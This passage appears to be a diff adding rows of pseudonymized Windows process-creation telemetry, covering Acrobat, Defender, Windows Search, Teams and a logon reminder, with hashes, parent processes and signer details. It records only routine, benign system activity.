00:54:55.399203100+00:00,87c409ec-7c58-4bf6-8fcc-5c4a6353b4bd,computerpii_0a470890c60768167990033d701e7bd881398861,155459,False,10.7740.19041.1052,False,11540474045171961,,11540474045171965,2021-06-23 00:53:49.101875800+00:00,17288,2021-06-23 00:53:49.101875800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,17288,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 00:53:49.095230100+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+312,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:09:28.613648300+00:00,20676,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 8C76247B-A620-55AC-447B-763BA810989D ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:09:29.108228900+00:00,2021-06-24 03:10:33.785378600+00:00,d7b3a985-3679-4042-8936-5bf37ca4fa21,computerpii_0a470890c60768167990033d701e7bd881398861,173981,False,10.7740.19041.1052,False,11540474045145394,,11540474045176167,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+313,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 09:07:30.351538100+00:00,21292,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\Form\FilePII_83f9d5653f6a43d9a74fb8145970c034e45ffa99.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:07:30.400487+00:00,2021-06-24 09:09:32.803936700+00:00,e2aeafc5-45f4-4f00-867c-f228e3c310be,computerpii_0a470890c60768167990033d701e7bd881398861,178085,False,10.7740.19041.1052,False,11540474045175127,,11540474045177514,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,16512,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+314,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:56:52.388750200+00:00,5816,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320750_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320750 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:56:52.490731600+00:00,2021-06-24 01:58:29.933662200+00:00,f8b8e054-9ac5-4fe7-98fe-5861707c939b,computerpii_0a470890c60768167990033d701e7bd881398861,172722,False,10.7740.19041.1052,False,11540474045144190,,11540474045175873,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+315,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:27:11.264754900+00:00,13920,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:27:11.465622800+00:00,2021-06-24 11:28:18.279608400+00:00,9e307593-964e-4fcf-a3a2-d71e7c5fc9cf,computerpii_0a470890c60768167990033d701e7bd881398861,180129,False,10.7740.19041.1052,False,11540474045177893,,11540474045178029,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+316,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:49:11.281863900+00:00,18824,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe749_ Global\UsGthrCtrlFltPipeMssGthrPipe749 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:49:12.142531300+00:00,2021-06-24 01:50:25.489459600+00:00,371c82fd-8e98-4717-8d0e-29435bee8efb,computerpii_0a470890c60768167990033d701e7bd881398861,172496,False,10.7740.19041.1052,False,11540474045144190,,11540474045175834,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+317,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:44:40.276841600+00:00,7860,wlrmdr.exe,"-s -1 -f 2 -t You're about to be signed out -m Windows will shut down in 10 minutes.
+
+ Shutdown will start on Friday, June 25, 2021 10:54:40 AM. -a 3",PortableExecutable,2021-02-17 04:34:46.345022800+00:00,C:\Windows\System32\wlrmdr.exe,68184,ef9bba7a637a11b224a90bf90a8943ac,2fda95aafb2e9284c730bf912b93f60a75b151941adc14445ed1e056140325b1,4747ec6efd2d41e049159249c2d888189bb33d1d,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 11:50:09.647766100+00:00,14008,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-24 11:50:09.489133800+00:00,17800,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:44:40.584400400+00:00,2021-06-25 02:46:52.665737700+00:00,1e470018-24c9-4600-ae13-01e1e25e0697,computerpii_0a470890c60768167990033d701e7bd881398861,185862,False,10.7740.19041.1052,False,11540474045178088,,11540474045179154,2021-06-24 11:50:09.647766100+00:00,14008,2021-06-24 11:50:09.647766100+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,14008,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-24 11:50:09.650809300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,WLRMNDR.EXE,WLRMNDR.EXE,Windows logon reminder
+318,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:45.169664700+00:00,15720,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=16168",PortableExecutable,2021-05-28 05:59:00+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,5549280,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:45.109343700+00:00,16168,AdobeCollabSync.exe,"""AdobeCollabSync.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:45.336413100+00:00,2021-06-24 11:01:05.199785700+00:00,b95b02ca-f98b-47fa-9349-7e5479173023,computerpii_0a470890c60768167990033d701e7bd881398861,179511,False,10.7740.19041.1052,False,11540474045177894,,11540474045177895,2021-06-24 10:59:45.109343700+00:00,16168,2021-06-24 10:59:45.109343700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,16168,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-24 10:59:45.170367400+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+319,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:45.379307800+00:00,12040,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1788 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:45.431556+00:00,2021-06-24 11:01:05.199982100+00:00,224d5620-391d-4349-955e-553a718163a6,computerpii_0a470890c60768167990033d701e7bd881398861,179515,False,10.7740.19041.1052,False,11540474045177893,,11540474045177896,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+320,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:45.470949300+00:00,5668,Teams.exe,"""Teams.exe"" --type=utility --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --enable-wer --ms-teams-less-cors=522133263 --electron-shared-settings=eyJ********** --mojo-platform-channel-handle=2216 /prefetch:8",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:45.547077500+00:00,2021-06-24 11:01:05.200130100+00:00,8b967767-7760-4707-8715-f9f8f73c8c90,computerpii_0a470890c60768167990033d701e7bd881398861,179518,False,10.7740.19041.1052,False,11540474045177893,,11540474045177897,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+321,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:45.547434500+00:00,8460,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\FilePII_b3dffdae7daffa46d23ed7197baff899565e8592.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2564 /prefetch:1 --msteams-process-type=loadingWindow",PortableExecutable,2021-05-18 